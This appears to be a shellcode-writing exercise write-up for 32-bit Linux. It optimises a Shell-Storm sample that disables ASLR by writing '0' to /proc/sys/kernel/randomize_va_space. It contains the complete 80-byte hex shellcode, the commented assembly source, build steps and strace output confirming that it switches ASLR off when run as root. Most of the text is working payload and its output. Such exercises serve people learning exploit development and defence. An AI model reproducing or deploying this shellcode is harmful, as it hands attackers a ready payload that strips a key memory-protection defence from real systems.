Copy to other file
$ cp asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop.asm asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt.asm
Create shellcode of binary and paste output in C template
$ ../convert_bin_sc.sh asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt
"\x31\xc0\x89\xc1\x89\xc2\xeb\x20\x5b\x66\xb9\xbc\x02\xb0\x08\xcd\x80\x89\xc3\x50\x66\xba\x30\x3a\x66\x52\x89\xe1\x31\xd2\x66\x42\xb0\x04\xcd\x80\x89\xd0\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65"Compile the file as C
$ ../compile_c.sh asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt_c
[+] Compiling ...
[+] Done!Make sure ASLR is enabled
# echo 1 > /proc/sys/kernel/randomize_va_space
# cat /proc/sys/kernel/randomize_va_space
1Run as root and check output and length
Although some modifications were made, the final length of the shellcode is 80 bytes: saving three bytes of the original 83 bytes.
# strace ./asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt_c
execve("./asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt_c", ["./asm_linx86_aslr-disable_shells"...], [/* 22 vars */]) = 0
brk(0) = 0x804b000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7755000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=74313, ...}) = 0
mmap2(NULL, 74313, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7742000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\226\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1730024, ...}) = 0
mmap2(NULL, 1743580, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7598000
mprotect(0xb773b000, 4096, PROT_NONE) = 0
mmap2(0xb773c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a3) = 0xb773c000
mmap2(0xb773f000, 10972, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb773f000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7597000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7597900, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb773c000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb7778000, 4096, PROT_READ) = 0
munmap(0xb7742000, 74313) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7754000
write(1, "Shellcode Length: 80\n", 22Shellcode Length: 80
) = 22
creat("/proc/sys/kernel/randomize_va_space", 01274) = 3
write(3, "0", 1) = 1
_exit(3) = ?
# cat /proc/sys/kernel/randomize_va_space
0
asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt.asm
global _start
section .text
_start:
; Clear registers
xor eax,eax
; mov ebx, eax ; Value gets popped via jmp/pop/call
mov ecx, eax
mov edx, eax
; sys_creat
; int creat(const char *pathname, mode_t mode);
; push eax ; Terminate string with NULL --> not required
jmp string ; Jump to function string for stringvariable
append:
pop ebx ; Pop value of string into EBX
; mov ebx,esp ; Copy stackpointer to stringvalue in EBX for pathname argument
mov cx,0x2bc ; Value for mode argument, 700 --> S_IRWXU
mov al,0x8 ; sys_create call 0x8
int 0x80 ; syscall
; sys_write
; ssize_t write(int fd, const void *buf, size_t count);
mov ebx,eax ; Copy previously stored FD from creat into EBX
push eax ; Push the FD on stack
mov dx,0x3a30 ; Count value parameter for size
push dx ; Put value on stack
mov ecx,esp ; Copy the current stackpointer to ECX for buffer argument
xor edx,edx ; Clear EDX
; mov dx, 0x1 ; Set to 1 for size argument
inc dx
mov al,0x4 ; Set syscall 0x4 for write
int 0x80 ; syscall
; sys_close
; int close(int fd);
; mov al,0x6 ; Close call
; int 0x80 ; syscall, returns zero into EAX
; sys_exit
; xor eax, eax ; Clear register
; inc eax ; Increment for 1
mov eax, edx ; Copy value 1 from register EDX to EAX
int 0x80 ; syscall exit
string:
call append
SomeString: db "/proc/sys/kernel/randomize_va_space"